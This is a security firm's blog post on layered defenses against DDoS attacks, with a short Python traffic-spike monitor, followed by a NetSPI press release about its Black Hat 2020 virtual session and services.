Learning from others: Amazon Web Services (AWS) successfully thwarted the largest DDoS attack ever recorded on its infrastructure, internet infrastructure firms Akamai and Cloudflare fended off record-breaking DDoS attacks in June, and online gaming platforms are being targeted as attackers figure out how to further monetize DDoS attacks (see: GGPoker). These recent attacks underscore how similar vulnerabilities and weaknesses can easily propagate across many organizations, since there’s a tendency to reuse similar technologies to support business functions, such as widespread use of open source code or network hardware. Additionally, it’s common for simple misconfiguration issues to result in breaches with significant business impact.

It’s important to understand that there are two common forms of DDoS attacks:

  1. Application layer attacks where attackers try to overload a server by sending an overwhelming number of requests that end up overtaking much of the processing power.
  2. Network layer attacks where attackers try to overwhelm network bandwidth and deny service to legitimate network traffic.

The ultimate goal of both techniques is to overwhelm a particular business, service, web app, mobile app, etc. and keep them from being accessible to legitimate access requests from the intended users/customers. This is extremely challenging to manage since the attacks come from compromised machines or ‘bots’ in a very distributed fashion, which makes blocking those requests using simple filtering techniques unrealistic.

Many web application firewall vendors have DDoS mitigation solutions available for customers to buy, but that shouldn’t be the only step organizations rely on. Defense in depth – an approach to cyber security in which defensive tactics are layered so that backup measures exist in case another security control fails – is key for all security concepts. Here are five techniques organizations can layer on to stop DDoS attacks:

  1. Penetration Testing – Although it’s difficult to properly simulate full-scale DDoS attacks during a penetration test, it’s important to do regular third-party testing that simulates real-world attacks against your infrastructure and applications. A proactive penetration testing approach will allow organizations to be prepared for when the time comes that they’re actually under attack. Tip: Implement Penetration Testing as a Service (PTaaS) to enable continuous, always-on vulnerability testing.
  2. Vulnerability Management and Patching – Ensure that all your systems have been properly updated to the latest version and any relevant security and/or performance patches have been applied. A proper patching and vulnerability management process will ensure this is happening within a reasonable timeframe and within acceptable risk thresholds for the business.
  3. Incident Response Planning – Build a team whose focus is on responding in an expedited fashion with the appropriate response. This team’s focus needs to be on minimizing the impact of the attack and triggering the appropriate processes so that communications with customers and internal teams happen effectively. More on incident response planning here.
  4. Traffic Anomaly Monitoring – Make sure there’s proper monitoring taking place across all network traffic to set off alerts if abnormal behavior is detected from suspicious sources, especially from geographies that don’t make normal business sense (a toy sketch of this idea follows this list).
  5. Threat Intelligence and Social Media – Keep an eye on threat intel feeds and social media for any relevant information that may help predict attacks before they happen, allowing organizations to plan accordingly.
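To make the traffic anomaly monitoring idea from item 4 concrete, here is a deliberately naive Python sketch that flags an interval whose request count sits well above a rolling baseline. The window size and sigma threshold are illustrative assumptions; a production detector would also account for seasonality, source reputation, and geography:

import collections
import statistics

class TrafficMonitor:
    """Flag request-count spikes against a rolling baseline (toy example)."""

    def __init__(self, window=60, threshold_sigma=3.0):
        self.history = collections.deque(maxlen=window)  # recent per-interval request counts
        self.threshold_sigma = threshold_sigma

    def observe(self, count):
        alert = False
        if len(self.history) >= 10:  # wait for a minimal baseline
            mean = statistics.mean(self.history)
            stdev = statistics.pstdev(self.history) or 1.0  # guard against perfectly flat traffic
            if count > mean + self.threshold_sigma * stdev:
                alert = True
        self.history.append(count)
        return alert

monitor = TrafficMonitor()
for count in [100, 104, 98, 101, 99, 103, 97, 100, 102, 99, 101, 5000]:
    if monitor.observe(count):
        print('ALERT: request volume spike (%d requests this interval)' % count)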

DDoS is just one of many cyberattack methods that have increased due to COVID-19 remote working dependency. As networks continue to expand, we are opening new entry points to attackers to secure footholds and cause critical damage – pointing to the need for continuous evaluation of security strategies.

My overarching advice? Go beyond the baseline security measures, such as a firewall, and implement a proactive security strategy to identify and remediate vulnerabilities, monitor network activity, plan for a breach as they become more inevitable, and connect with the security community to stay on top of the latest threat intel.


NetSPI to Help Black Hat USA 2020 Attendees View Penetration Testing and Application Security Through a New Lens

During the Black Hat 2020 Virtual Conference, NetSPI, a leader in enterprise security testing and vulnerability management, will provide a fresh perspective on optimizing pentesting and application security (AppSec) programs. Today, there are more software-based solutions than ever before. From rising dependency on smartphone applications to the growing remote workforce increasing the usage of cloud-based software, reliance on software continues to grow. This means more AppSec security tools and automation have become available – and, in turn, an overwhelming number of AppSec methodologies and approaches to follow. To navigate the complex security considerations, NetSPI is working to change the way organizations think about AppSec by embracing security throughout the development lifecycle.

Who:
Deke George, CEO, NetSPI
Aaron Shilts, President and COO, NetSPI
Nabil Hannan, Managing Director, NetSPI
Jake Reynolds, Product Manager, NetSPI


What:
On Wednesday, August 5, from 11:20–11:40am PT, NetSPI Managing Director Nabil Hannan and Product Manager Jake Reynolds will host a session titled, Extreme Makeover: AppSec Edition. During the session, attendees will learn how leading organizations use different discovery techniques as part of their AppSec programs, understand the strengths and weaknesses of common AppSec vulnerability discovery technologies, and adopt techniques that make security frictionless for developers as they embrace a DevSecOps culture. Additionally, they will discover how functional an application security program can be with a “makeover” to:

  • Enhance reporting to empower leadership to optimize AppSec programs
  • Improve vulnerability ingestion, correlation, and enrichment
  • Increase speed to remediation

The NetSPI team will have a virtual exhibitor booth in the Black Hat Business Hall. Schedule a briefing to hear the latest company updates and explore NetSPI’s new products and services, including:

  • Static Application Security Testing [SAST] and Secure Code Review [SCR]: Debuted at Black Hat, the new services are designed to identify application security vulnerabilities earlier in the software development life cycle.
  • Strategic Advisory Services: In June 2020, NetSPI revealed a new application-centric approach to its Strategic Advisory Services to help organizations gain a competitive edge through a formalized, business-objective driven, and mature application security program.
  • Pentesting as a Service (PTaaS): Launched in 2020, NetSPI’s PTaaS delivery model puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and perform always-on continuous testing.


When:
Virtual Session: Wednesday, August 5, 11:20–11:40am PT
Black Hat 2020 Virtual Conference: August 1-6, 2020


Where:
Attend the virtual session, Extreme Makeover: AppSec Edition, online here.
Stop by NetSPI’s virtual booth by searching for NetSPI in the Black Hat event portal.


Media:
Virtual briefings with the NetSPI team available upon request. To attend the virtual session on August 5, register for a free Black Hat Business Pass.


Contact:
Tori Norris
Maccabee Public Relations on behalf of NetSPI
tori@maccabee.com, (612) 294-3100
